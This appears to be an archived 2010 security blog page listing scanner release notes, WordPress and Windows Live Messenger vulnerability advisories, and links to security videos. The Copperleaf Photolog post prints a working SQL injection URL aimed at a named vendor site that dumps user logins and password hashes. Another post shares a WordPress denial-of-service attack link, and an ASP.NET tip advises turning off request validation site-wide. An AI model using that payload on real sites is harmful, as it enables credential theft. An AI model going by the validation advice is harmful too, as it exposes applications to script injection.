Acunetix v6.5 build 20100303 released

by kad1r 4. March 2010 12:45

New Features:

Added new option to export results to HTTP Fuzzer

Test for XML External Entity Injection

Test for XML Injection

Improved directory traversal vulnerability check

Improved Cross-site Scripting (XSS) vulnerability checks

Fixed: access violation when the application exists

Fixed: access violation when protocol was terminated in NotifyCaller function in LSR

Fixed: AbortVulnXML OnFirstAlert was not imported from settings

Fixed: Form values were not encoded correctly when submitted from JavaScript (CSA engine)

How to upgrade: On starting up Acunetix WVS, a pop up window will automatically notify you that a more recent build is available for download. To download the latest build, navigate to General > Program Updates node in the Tools explorer, and click on Download and Install new build.

Download Acunetix

039d05f8-efe4-410f-a388-be241e143b8a|0|.0

Tags: acunetix v6.5, acunetix, web secure acunetix, web security, web security test

Released | Security

WordPress 0.16 Copperleaf Photolog SQL injection

by kad1r 25. February 2010 11:50

SecurityAlert: 7032

CVE: CVE-2010-0673

CWE: CWE-89

SecurityRisk: High

Remote Exploit: Yes

Local Exploit: No

Victim interaction required: No

Exploit Available: Yes

Credit: kaMtiEz

Published: 25.02.2010

Affected Software: copperleaf:photolog:0.16

[+] Demo Vendor

http://www.copperleaf.org/wp-content/themes/limon/cplphoto.php?postid=416+a nd+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,1 0,11,12+from+wp_users--&id=2097

References:

http://www.securityfocus.com/bid/38239

http://www.exploit-db.com/exploits/11458

149c03ac-c522-41f0-9158-12db64f19f7b|0|.0

Tags: wordpress 0.16 copperleaf photolog sql injection, wp 0.16 photoblog sql injection, wp photoblog sql injection

Issues | Security

ASP.Net Html Post Security

by kad1r 11. February 2010 12:28

If you're using any editor like Fck, Tinymce ..etc sometimes you get potentially dangerous form value error. It says this is dangerous but sometimes it's not dangerous. When you trust your codes and want to remove this error you need to add to ValidateRequest="false". This code just for adding page. If you want to remove all you need to add <pages validateRequest="false" /> to web.config file between system.web tags.

f0be4e28-3750-4820-891d-2f6108342b94|0|.0

Tags: html post security, asp.net post security, potentially dangerous form value in asp.net

ASP.Net | Security

WordPress 2.9 plugin wp-wall (XSS)

by kad1r 13. January 2010 13:54

Arrow Topic : WordPress 2.9 plugin wp-wall (XSS) Cross Site Scripting Vulnerability

Arrow ExploitAlert : 7683

Arrow Credit : Cair3x

Arrow Date : 12.01.2010

Source

5a337fd1-a6c8-4519-962b-43dca51b0d46|0|.0

Tags: wordpress 2.9 plugin wp-wall (xss), wp xss, wp 2.9 xss

Security

Windows Live Messenger 2009 ActiveX DoS Vulnerability

by kad1r 11. January 2010 13:34

# Title: Windows Live Messenger 2009 ActiveX DoS Vulnerability
# EDB-ID: 11070
# CVE-ID: ()
# OSVDB-ID: ()
# Author: HACKATTACK IT SECURITY GmbH
# Published: 2010-01-08
# Verified: yes
# Download Exploit Code
# Download N/A

21af3d56-55ed-492f-baa9-181d16eb7693|0|.0

Tags: wlm, activex dos, activex dos vulnerability, wlm dos vuln

Security

Wordpress 2.9 0Day Dos

by kad1r 31. December 2009 11:43

Here is the wordpress dos attack. It's for version 2.9. Enjoy.
http://codepaste.net/nbzr3k

b55ec231-7169-4db0-aee1-2a96fae4fc13|0|.0

Tags: wordpress 2.9 0day dos, dos for wordpress, wordpress 2.9 exploit

Security

WordPress and Pyrmont V2. SQL Injection Vulnerability

by kad1r 31. December 2009 10:58

Affected Software: imotta:pyrmont_plugin:2
SecurityRisk: Medium
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : No
Credit : Gamoscu
Published : 30.12.2009
http://securityreason.com/securityalert/6880

1430d969-8015-484b-9291-a7a6705a7bf6|0|.0

Tags: wp sql injection, wordpress and pyrmont v2. sql injection vulnerability, wordpress and pytmont sql injection

Security

Security Videos For Your Life ;)

by kad1r 25. December 2009 14:33

http://www.milw0rm.com/video/

http://whitehatworld.com/archives.html

http://www.hak5.org/category/episodes

http://www.theacademypro.com/index.php

http://www.irongeek.com/i.php?page=security/hackingillustrated

http://www.securitytube.net/

http://www.rmccurdy.com/scripts/videos/

http://www.veryangrytoad.com/categories/8/

http://m3gabyt3.blip.tv/posts?view=archive&nsfw=dc

http://hopetracker.donthax.me/

http://adventuresinsecurity.com/resources

http://www.security-freak.net/videos.html

http://www.youtube.com/helpnetsecurity?gl=GB&hl=en-GB

http://vimeo.com/user595761/videos/sort:date

http://blip.tv/search?q=backtrack&x=0&y=0

http://www.knowledgecave.com/modules.php?name=Video_Stream

http://www.youtube.com/theacademypro

http://infinityexists.com/

http://www.youtube.com/user/ImpervaChannel

http://vimeo.com/pauldotcom/videos

http://vimeo.com/user1781217/videos/sort:date

http://www.hackerscenter.com/index.php?/Video/General/

http://securityoverride.com/about/

http://www.social-engineer.org/blog/resources/

http://pentest.cryptocity.net/

http://yehg.net/lab/pr0js/training/webgoat.php

af65980b-e385-4b1f-8f68-cfceedb381b7|0|.0

Tags: security, security videos

Security

Acunetix v6.5 build 20100303 released

WordPress 0.16 Copperleaf Photolog SQL injection

ASP.Net Html Post Security

WordPress 2.9 plugin wp-wall (XSS)

Windows Live Messenger 2009 ActiveX DoS Vulnerability

Wordpress 2.9 0Day Dos

WordPress and Pyrmont V2. SQL Injection Vulnerability

Security Videos For Your Life ;)

Widgets

Wordle

Twitter

Widgets

Wordle

Categories

Links

Twitter